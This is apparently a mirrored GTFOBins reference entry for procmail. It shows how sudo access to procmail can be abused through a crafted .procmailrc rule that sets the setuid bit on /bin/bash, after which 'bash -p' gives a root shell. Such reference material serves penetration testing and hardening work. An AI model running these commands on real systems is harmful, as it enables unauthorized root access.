mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-27 22:10:48 +01:00
12 lines
367 B
Markdown
12 lines
367 B
Markdown
|
---
|
||
|
description: |
|
||
|
Procmail is an email server software component.
|
||
|
functions:
|
||
|
sudo:
|
||
|
- description: By modifying/creating a procmailrc configuration file, we can specify a processing rule for any command we want.
|
||
|
code: |
|
||
|
echo -e ':0\n| chmod u+s /bin/bash' > .procmailrc
|
||
|
echo "gtfobins" | sudo procmail -m .procmailrc
|
||
|
bash -p
|
||
|
---
|